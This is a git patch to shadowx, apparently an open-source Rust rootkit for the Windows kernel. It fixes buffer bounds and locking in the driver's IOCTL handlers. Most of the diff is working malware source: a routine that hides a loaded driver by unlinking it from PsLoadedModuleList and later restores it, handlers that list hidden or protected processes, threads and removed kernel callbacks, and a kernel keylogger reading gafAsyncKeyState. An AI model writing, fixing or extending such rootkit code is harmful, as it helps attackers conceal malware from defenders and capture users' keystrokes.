From 5ad4255d2b3a1de6018b92f3732bb4e85297c8c0 Mon Sep 17 00:00:00 2001 From: joaoviictorti Date: Tue, 25 Feb 2025 23:39:08 -0300 Subject: [PATCH] fix: Fixing some logic bugs --- driver/src/ioctls.rs | 95 +++++++++++--------- driver/src/utils.rs | 56 ++++++++++-- shadowx/src/data/externs.rs | 4 + shadowx/src/driver.rs | 172 +++++++++++++++++++----------------- shadowx/src/error.rs | 4 + shadowx/src/misc.rs | 5 -- shadowx/src/module.rs | 1 + shadowx/src/utils/lock.rs | 28 ++++++ 8 files changed, 229 insertions(+), 136 deletions(-) diff --git a/driver/src/ioctls.rs b/driver/src/ioctls.rs index a967fd9..0787821 100644 --- a/driver/src/ioctls.rs +++ b/driver/src/ioctls.rs @@ -184,7 +184,7 @@ impl IoctlManager { self.register_handler(ENUMERATION_PROCESS, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | { unsafe { // Retrieves the output buffer to store process information. - let output_buffer = get_output_buffer::(irp)?; + let (output_buffer, max_entries) = get_output_buffer::(irp, stack)?; let input_target = get_input_buffer::(stack)?; // Based on the options, either enumerate hidden or protected processes. @@ -198,11 +198,11 @@ impl IoctlManager { _ => Vec::new(), }; + // Ensure we do not exceed buffer limits + let entries_to_copy = core::cmp::min(processes.len(), max_entries); + // Fill the output buffer with the enumerated processes' information. - for (index, process) in processes.iter().enumerate() { - let info_ptr = output_buffer.add(index); - (*info_ptr).pid = process.pid; - } + core::ptr::copy_nonoverlapping(processes.as_ptr(), output_buffer, entries_to_copy); // Updates the IoStatus with the size of the enumerated processes. (*irp).IoStatus.Information = (processes.len() * size_of::()) as u64; @@ -338,26 +338,32 @@ impl IoctlManager { // Enumerate loaded modules in the target process. self.register_handler(ENUMERATE_MODULE, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION| { unsafe { - // Get the target process from the input buffer. + // Get the target process from the input buffer let target_process = get_input_buffer::(stack)?; - let module_info = get_output_buffer::(irp)?; + let (module_info, max_entries) = get_output_buffer::(irp, stack)?; let pid = (*target_process).pid; // Enumerate modules in the process. let modules = shadowx::Module::enumerate_module(pid)?; - // Populate the output buffer with module information. - for (index, module) in modules.iter().enumerate() { - let info_ptr = module_info.add(index); + // Ensure we do not exceed buffer limits + let entries_to_copy = core::cmp::min(modules.len(), max_entries); - // Copy module name and populate module information. - core::ptr::copy_nonoverlapping(module.name.as_ptr(), (*info_ptr).name.as_mut_ptr(), module.name.len()); + // Populate the output buffer with module information + for (index, module) in modules.iter().take(entries_to_copy).enumerate() { + let info_ptr = module_info.add(index); + + // Ensure the name is not copied beyond the buffer size + let name_length = core::cmp::min(module.name.len(), (*info_ptr).name.len()); + core::ptr::copy_nonoverlapping(module.name.as_ptr(), (*info_ptr).name.as_mut_ptr(), name_length); + + // Copy other fields safely (*info_ptr).address = module.address; (*info_ptr).index = index as u8; } // Update IoStatus with the number of modules enumerated. - (*irp).IoStatus.Information = (modules.len() * size_of::()) as u64; + (*irp).IoStatus.Information = (entries_to_copy * size_of::()) as u64; Ok(STATUS_SUCCESS) } })); @@ -508,26 +514,20 @@ impl IoctlManager { })); // Enumerating active drivers on the system. - self.register_handler(ENUMERATE_DRIVER, Box::new(|irp: *mut IRP, _: *mut IO_STACK_LOCATION| { + self.register_handler(ENUMERATE_DRIVER, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION| { unsafe { // Get the output buffer for returning the driver information. - let driver_info = get_output_buffer::(irp)?; + let (driver_info, max_entries) = get_output_buffer::(irp, stack)?; // Enumerate the drivers currently loaded in the system. let drivers = shadowx::Driver::enumerate_driver()?; - // Copy driver information into the output buffer. - for (index, module) in drivers.iter().enumerate() { - let info_ptr = driver_info.add(index); - - // Copy the driver name and other information. - core::ptr::copy_nonoverlapping(module.name.as_ptr(), (*info_ptr).name.as_mut_ptr(), module.name.len()); - (*info_ptr).address = module.address; - (*info_ptr).index = index as u8; - } + // Copy only what fits in the user buffer + let entries_to_copy = core::cmp::min(drivers.len(), max_entries); + core::ptr::copy_nonoverlapping(drivers.as_ptr(), driver_info, entries_to_copy); // Set the size of the returned information. - (*irp).IoStatus.Information = (drivers.len() * size_of::()) as u64; + (*irp).IoStatus.Information = (entries_to_copy * size_of::()) as u64; Ok(STATUS_SUCCESS) } })); @@ -597,7 +597,7 @@ impl IoctlManager { self.register_handler(ENUMERATION_THREAD, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | { unsafe { // Retrieves the output buffer to store thread information. - let output_buffer = get_output_buffer::(irp)?; + let (output_buffer, max_entries) = get_output_buffer::(irp, stack)?; let input_target = get_input_buffer::(stack)?; // Based on the options, either enumerate hidden or protected threads. @@ -611,14 +611,12 @@ impl IoctlManager { _ => Vec::new(), }; - // Fill the output buffer with the enumerated threads' information. - for (index, thread) in threads.iter().enumerate() { - let info_ptr = output_buffer.add(index); - (*info_ptr).tid = thread.tid; - } + // Copy only what fits in the user buffer + let entries_to_copy = core::cmp::min(threads.len(), max_entries); + core::ptr::copy_nonoverlapping(threads.as_ptr(), output_buffer, entries_to_copy); // Updates the IoStatus with the size of the enumerated threads. - (*irp).IoStatus.Information = (threads.len() * size_of::()) as u64; + (*irp).IoStatus.Information = (entries_to_copy * size_of::()) as u64; Ok(STATUS_SUCCESS) } })); @@ -654,7 +652,7 @@ impl IoctlManager { self.register_handler(ENUMERATE_CALLBACK, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | { unsafe { let target_callback = get_input_buffer::(stack)?; - let callback_info = get_output_buffer::(irp)?; + let (callback_info, max_entries) = get_output_buffer::(irp, stack)?; let callbacks = match (*target_callback).callback { Callbacks::PsSetCreateProcessNotifyRoutine | Callbacks::PsSetCreateThreadNotifyRoutine @@ -666,10 +664,17 @@ impl IoctlManager { | Callbacks::ObThread => shadowx::CallbackOb::enumerate((*target_callback).callback)?, }; - for (index, callback) in callbacks.iter().enumerate() { + // Ensure we do not exceed buffer limits + let entries_to_copy = core::cmp::min(callbacks.len(), max_entries); + + for (index, callback) in callbacks.iter().take(entries_to_copy).enumerate() { let info_ptr = callback_info.add(index); - - core::ptr::copy_nonoverlapping(callback.name.as_ptr(), (*info_ptr).name.as_mut_ptr(), callback.name.len()); + + // Ensure the name is not copied beyond the buffer size + let name_length = core::cmp::min(callback.name.len(), (*info_ptr).name.len()); + core::ptr::copy_nonoverlapping(callback.name.as_ptr(), (*info_ptr).name.as_mut_ptr(), name_length); + + // Copy other fields safely (*info_ptr).address = callback.address; (*info_ptr).index = index as u8; (*info_ptr).pre_operation = callback.pre_operation; @@ -677,7 +682,7 @@ impl IoctlManager { } // Set the size of the returned information. - (*irp).IoStatus.Information = (callbacks.len() * size_of::()) as u64; + (*irp).IoStatus.Information = (entries_to_copy * size_of::()) as u64; Ok(STATUS_SUCCESS) } })); @@ -728,7 +733,7 @@ impl IoctlManager { self.register_handler(ENUMERATE_REMOVED_CALLBACK, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | { unsafe { let target_callback = get_input_buffer::(stack)?; - let callback_info = get_output_buffer::(irp)?; + let (callback_info, max_entries) = get_output_buffer::(irp, stack)?; let callbacks = match (*target_callback).callback { Callbacks::PsSetCreateProcessNotifyRoutine | Callbacks::PsSetCreateThreadNotifyRoutine @@ -740,10 +745,16 @@ impl IoctlManager { | Callbacks::ObThread => shadowx::CallbackOb::enumerate_removed()?, }; - for (index, callback) in callbacks.iter().enumerate() { + // Ensure we do not exceed buffer limits + let entries_to_copy = core::cmp::min(callbacks.len(), max_entries); + for (index, callback) in callbacks.iter().take(entries_to_copy).enumerate() { let info_ptr = callback_info.add(index); - - core::ptr::copy_nonoverlapping(callback.name.as_ptr(), (*info_ptr).name.as_mut_ptr(), callback.name.len()); + + // Ensure the name is not copied beyond the buffer size + let name_length = core::cmp::min(callback.name.len(), (*info_ptr).name.len()); + core::ptr::copy_nonoverlapping(callback.name.as_ptr(), (*info_ptr).name.as_mut_ptr(), name_length); + + // Copy other fields safely (*info_ptr).address = callback.address; (*info_ptr).index = callback.index; (*info_ptr).pre_operation = callback.pre_operation; @@ -751,7 +762,7 @@ impl IoctlManager { } // Set the size of the returned information. - (*irp).IoStatus.Information = (callbacks.len() * size_of::()) as u64; + (*irp).IoStatus.Information = (entries_to_copy * size_of::()) as u64; Ok(STATUS_SUCCESS) } })); diff --git a/driver/src/utils.rs b/driver/src/utils.rs index 24aaa0e..f97230f 100644 --- a/driver/src/utils.rs +++ b/driver/src/utils.rs @@ -1,5 +1,9 @@ -use wdk_sys::{_IO_STACK_LOCATION, IRP}; use shadowx::error::ShadowError; +use wdk_sys::{ + ntddk::{ExAllocatePool2, ExFreePool, MmCopyMemory}, + IRP, MM_COPY_ADDRESS, MM_COPY_MEMORY_VIRTUAL, + NT_SUCCESS, POOL_FLAG_NON_PAGED, _IO_STACK_LOCATION +}; /// Retrieves the input buffer from the given IO stack location. /// @@ -11,18 +15,47 @@ use shadowx::error::ShadowError; /// /// * `Result<*mut T, ShadowError>` - A result containing the pointer to the input buffer or an NTSTATUS error code. pub unsafe fn get_input_buffer(stack: *mut _IO_STACK_LOCATION) -> Result<*mut T, ShadowError> { - let buffer = (*stack).Parameters.DeviceIoControl.Type3InputBuffer; - let length = (*stack).Parameters.DeviceIoControl.InputBufferLength; + // Retrieves the input buffer pointer from the I/O stack location. + let input_buffer= (*stack).Parameters.DeviceIoControl.Type3InputBuffer; + let input_length = (*stack).Parameters.DeviceIoControl.InputBufferLength; - if buffer.is_null() { + // Validate that the input buffer is not null + if input_buffer.is_null() { return Err(ShadowError::NullPointer("Type3InputBuffer")) } - if length < size_of::() as u32 { + // Validate that the input buffer size is sufficient + if input_length < size_of::() as u32 || input_length % size_of::() as u32 != 0 { return Err(ShadowError::BufferTooSmall); } - Ok(buffer as *mut T) + // Allocate a kernel-mode buffer in non-paged memory + let buffer = ExAllocatePool2(POOL_FLAG_NON_PAGED, size_of::() as u64, 0x1234) as *mut T; + if buffer.is_null() { + return Err(ShadowError::NullPointer("buffer")); + } + + // Prepare the MM_COPY_ADDRESS structure for secure copying. + let mut src_address = core::mem::zeroed::(); + src_address.__bindgen_anon_1.VirtualAddress = input_buffer as *mut _; + + // Use `MmCopyMemory` to safely copy data from user-mode to kernel-mode + let mut bytes_copied = 0u64; + let status = MmCopyMemory( + buffer as *mut _, + src_address, + size_of::() as u64, + MM_COPY_MEMORY_VIRTUAL, + &mut bytes_copied, + ); + + if !NT_SUCCESS(status) || bytes_copied != size_of::() as u64 { + ExFreePool(buffer as *mut _); + return Err(ShadowError::InvalidMemory); + } + + // Successfully copied the buffer; return the kernel-mode pointer + Ok(buffer) } /// Retrieves the output buffer from the given IRP. @@ -34,11 +67,18 @@ pub unsafe fn get_input_buffer(stack: *mut _IO_STACK_LOCATION) -> Result<*mut /// # Returns /// /// * `Result<*mut T, ShadowError>` - A result containing the pointer to the output buffer or an NTSTATUS error code. -pub unsafe fn get_output_buffer(irp: *mut IRP) -> Result<*mut T, ShadowError> { +pub unsafe fn get_output_buffer(irp: *mut IRP, stack: *mut _IO_STACK_LOCATION) -> Result<(*mut T, usize), ShadowError> { let buffer = (*irp).UserBuffer; if buffer.is_null() { return Err(ShadowError::NullPointer("UserBuffer")); } - Ok(buffer as *mut T) + let output_length = (*stack).Parameters.DeviceIoControl.OutputBufferLength; + if output_length < size_of::() as u32 { + return Err(ShadowError::BufferTooSmall); + } + + let count = output_length as usize / size_of::(); + + Ok((buffer as *mut T, count)) } diff --git a/shadowx/src/data/externs.rs b/shadowx/src/data/externs.rs index ea27307..d8ac2e1 100644 --- a/shadowx/src/data/externs.rs +++ b/shadowx/src/data/externs.rs @@ -10,6 +10,10 @@ extern "C" { pub static mut IoDriverObjectType: *mut *mut _OBJECT_TYPE; } +extern "C" { + pub static PsLoadedModuleResource: *mut ERESOURCE; +} + extern "system" { pub fn PsGetProcessPeb(Process: PEPROCESS) -> PPEB; pub fn PsSuspendProcess(Process: PEPROCESS) -> NTSTATUS; diff --git a/shadowx/src/driver.rs b/shadowx/src/driver.rs index 390aa08..d3d5022 100644 --- a/shadowx/src/driver.rs +++ b/shadowx/src/driver.rs @@ -9,8 +9,9 @@ use alloc::{ vec::Vec, }; -use crate::LDR_DATA_TABLE_ENTRY; +use crate::{LDR_DATA_TABLE_ENTRY, lock::with_eresource_lock}; use crate::{error::ShadowError, uni, Result}; +use crate::data::PsLoadedModuleResource; use common::structs::DriverInfo; use obfstr::obfstr; @@ -40,49 +41,53 @@ impl Driver { } let list_entry = ldr_data as *mut LIST_ENTRY; - let mut next = (*ldr_data).InLoadOrderLinks.Flink as *mut LIST_ENTRY; - // Iterate through the loaded module list to find the target driver - while next != list_entry { - let current = next as *mut LDR_DATA_TABLE_ENTRY; + // Acquire the lock before modifying the module list + with_eresource_lock(PsLoadedModuleResource, || { + let mut next = (*ldr_data).InLoadOrderLinks.Flink as *mut LIST_ENTRY; - // Convert the driver name from UTF-16 to a Rust string - let buffer = core::slice::from_raw_parts( - (*current).BaseDllName.Buffer, - ((*current).BaseDllName.Length / 2) as usize, - ); - - // Check if the current driver matches the target driver - let name = String::from_utf16_lossy(buffer); - if name.contains(driver_name) { - // The next driver in the chain - let next = (*current).InLoadOrderLinks.Flink as *mut LDR_DATA_TABLE_ENTRY; - - // The previous driver in the chain - let previous = (*current).InLoadOrderLinks.Blink as *mut LDR_DATA_TABLE_ENTRY; - - // Storing the previous list entry, which will be returned - let previous_link = LIST_ENTRY { - Flink: next as *mut LIST_ENTRY, - Blink: previous as *mut LIST_ENTRY, - }; - - // Unlink the current driver - (*next).InLoadOrderLinks.Blink = previous as *mut LIST_ENTRY; - (*previous).InLoadOrderLinks.Flink = next as *mut LIST_ENTRY; - - // Make the current driver point to itself to "hide" it - (*current).InLoadOrderLinks.Flink = current as *mut LIST_ENTRY; - (*current).InLoadOrderLinks.Blink = current as *mut LIST_ENTRY; - - return Ok((previous_link, *current)); + // Iterate through the loaded module list to find the target driver + while next != list_entry { + let current = next as *mut LDR_DATA_TABLE_ENTRY; + + // Convert the driver name from UTF-16 to a Rust string + let buffer = core::slice::from_raw_parts( + (*current).BaseDllName.Buffer, + ((*current).BaseDllName.Length / 2) as usize, + ); + + // Check if the current driver matches the target driver + let name = String::from_utf16_lossy(buffer); + if name.contains(driver_name) { + // The next driver in the chain + let next = (*current).InLoadOrderLinks.Flink as *mut LDR_DATA_TABLE_ENTRY; + + // The previous driver in the chain + let previous = (*current).InLoadOrderLinks.Blink as *mut LDR_DATA_TABLE_ENTRY; + + // Storing the previous list entry, which will be returned + let previous_link = LIST_ENTRY { + Flink: next as *mut LIST_ENTRY, + Blink: previous as *mut LIST_ENTRY, + }; + + // Unlink the current driver + (*next).InLoadOrderLinks.Blink = previous as *mut LIST_ENTRY; + (*previous).InLoadOrderLinks.Flink = next as *mut LIST_ENTRY; + + // Make the current driver point to itself to "hide" it + (*current).InLoadOrderLinks.Flink = current as *mut LIST_ENTRY; + (*current).InLoadOrderLinks.Blink = current as *mut LIST_ENTRY; + + return Ok((previous_link, *current)); + } + + next = (*next).Flink; } - - next = (*next).Flink; - } - - // Return an error if the driver is not found - Err(ShadowError::DriverNotFound(driver_name.to_string())) + + // Return an error if the driver is not found + Err(ShadowError::DriverNotFound(driver_name.to_string())) + }) } /// Unhides a previously hidden driver by restoring it to the `PsLoadedModuleList`. @@ -102,18 +107,20 @@ impl Driver { list_entry: PLIST_ENTRY, driver_entry: *mut LDR_DATA_TABLE_ENTRY, ) -> Result { - // Restore the driver's link pointers - (*driver_entry).InLoadOrderLinks.Flink = (*list_entry).Flink as *mut LIST_ENTRY; - (*driver_entry).InLoadOrderLinks.Blink = (*list_entry).Blink as *mut LIST_ENTRY; + with_eresource_lock(PsLoadedModuleResource, || { + // Restore the driver's link pointers + (*driver_entry).InLoadOrderLinks.Flink = (*list_entry).Flink as *mut LIST_ENTRY; + (*driver_entry).InLoadOrderLinks.Blink = (*list_entry).Blink as *mut LIST_ENTRY; - // Link the driver back into the list - let next = (*driver_entry).InLoadOrderLinks.Flink; - let previous = (*driver_entry).InLoadOrderLinks.Blink; + // Link the driver back into the list + let next = (*driver_entry).InLoadOrderLinks.Flink; + let previous = (*driver_entry).InLoadOrderLinks.Blink; - (*next).Blink = driver_entry as *mut LIST_ENTRY; - (*previous).Flink = driver_entry as *mut LIST_ENTRY; + (*next).Blink = driver_entry as *mut LIST_ENTRY; + (*previous).Flink = driver_entry as *mut LIST_ENTRY; - Ok(STATUS_SUCCESS) + Ok(STATUS_SUCCESS) + }) } /// Enumerates all drivers currently loaded in the kernel. @@ -137,37 +144,40 @@ impl Driver { } let current = ldr_data as *mut LIST_ENTRY; - let mut next = (*ldr_data).InLoadOrderLinks.Flink; - let mut count = 0; - // Iterate over the list of loaded drivers - while next != current { - let ldr_data_entry = next as *mut LDR_DATA_TABLE_ENTRY; - - // Get the driver name from the `BaseDllName` field, converting it from UTF-16 to a Rust string - let buffer = core::slice::from_raw_parts( - (*ldr_data_entry).BaseDllName.Buffer, - ((*ldr_data_entry).BaseDllName.Length / 2) as usize, - ); - - // Prepare the name buffer, truncating if necessary to fit the 256-character limit - let mut name = [0u16; 256]; - let length = core::cmp::min(buffer.len(), 255); - name[..length].copy_from_slice(&buffer[..length]); - - // Populates the `DriverInfo` structure with name, address, and index - drivers.push(DriverInfo { - name, - address: (*ldr_data_entry).DllBase as usize, - index: count as u8, - }); - - count += 1; - - // Move to the next driver in the list - next = (*next).Flink; - } - - Ok(drivers) + with_eresource_lock(PsLoadedModuleResource, || { + let mut next = (*ldr_data).InLoadOrderLinks.Flink; + let mut count = 0; + + // Iterate over the list of loaded drivers + while next != current { + let ldr_data_entry = next as *mut LDR_DATA_TABLE_ENTRY; + + // Get the driver name from the `BaseDllName` field, converting it from UTF-16 to a Rust string + let buffer = core::slice::from_raw_parts( + (*ldr_data_entry).BaseDllName.Buffer, + ((*ldr_data_entry).BaseDllName.Length / 2) as usize, + ); + + // Prepare the name buffer, truncating if necessary to fit the 256-character limit + let mut name = [0u16; 256]; + let length = core::cmp::min(buffer.len(), 255); + name[..length].copy_from_slice(&buffer[..length]); + + // Populates the `DriverInfo` structure with name, address, and index + drivers.push(DriverInfo { + name, + address: (*ldr_data_entry).DllBase as usize, + index: count as u8, + }); + + count += 1; + + // Move to the next driver in the list + next = (*next).Flink; + } + + Ok(drivers) + }) } } diff --git a/shadowx/src/error.rs b/shadowx/src/error.rs index 54ed8e9..eae0946 100644 --- a/shadowx/src/error.rs +++ b/shadowx/src/error.rs @@ -17,6 +17,10 @@ pub enum ShadowError { #[error("{0} function failed on the line: {1}")] FunctionExecutionFailed(&'static str, u32), + /// Represents an error when an invalid memory access occurs. + #[error("Invalid memory access at address")] + InvalidMemory, + /// Error when a process with a specific identifier is not found. /// /// This error is returned when the system cannot locate a process with the given diff --git a/shadowx/src/misc.rs b/shadowx/src/misc.rs index dd2cbc1..9709470 100644 --- a/shadowx/src/misc.rs +++ b/shadowx/src/misc.rs @@ -113,11 +113,6 @@ impl Keylogger { // Retrieve the address of gafAsyncKeyState let gaf_async_key_state_address = Self::get_gafasynckeystate_address()?; - // Validate the address before proceeding - if MmIsAddressValid(gaf_async_key_state_address.cast()) == 0 { - return Err(ShadowError::FunctionExecutionFailed("MmIsAddressValid", line!())); - } - // Allocate an MDL (Memory Descriptor List) to manage the memory let mdl = IoAllocateMdl(gaf_async_key_state_address.cast(), size_of::<[u8; 64]>() as u32, 0, 0, null_mut()); if mdl.is_null() { diff --git a/shadowx/src/module.rs b/shadowx/src/module.rs index 82668c9..0e84b7d 100644 --- a/shadowx/src/module.rs +++ b/shadowx/src/module.rs @@ -132,6 +132,7 @@ impl Module { (*list_entry).FullDllName.Buffer, ((*list_entry).FullDllName.Length / 2) as usize, ); + if buffer.is_empty() { return Err(ShadowError::StringConversionFailed((*list_entry).FullDllName.Buffer as usize)); } diff --git a/shadowx/src/utils/lock.rs b/shadowx/src/utils/lock.rs index e15d8fa..f45e0d7 100644 --- a/shadowx/src/utils/lock.rs +++ b/shadowx/src/utils/lock.rs @@ -1,4 +1,6 @@ use wdk_sys::ntddk::{ExAcquirePushLockExclusiveEx, ExReleasePushLockExclusiveEx}; +use wdk_sys::ntddk::{ExAcquireResourceExclusiveLite, ExReleaseResourceLite}; +use wdk_sys::ERESOURCE; /// Generic function that performs the operation with the lock already acquired. /// It will acquire the lock exclusively and guarantee its release after use. @@ -26,3 +28,29 @@ where result } + +/// Executes an operation while holding an `ERESOURCE` lock. +/// +/// # Arguments +/// +/// * `resource` - Pointer to the `ERESOURCE` lock. +/// * `operation` - The function to execute while holding the lock. +pub fn with_eresource_lock(resource: *mut ERESOURCE, operation: F) -> T +where + F: FnOnce() -> T, +{ + unsafe { + // Acquire the exclusive lock before accessing the resource + ExAcquireResourceExclusiveLite(resource, 1); + } + + // Execute the operation while holding the lock + let result = operation(); + + unsafe { + // Release the lock after the operation + ExReleaseResourceLite(resource); + } + + result +}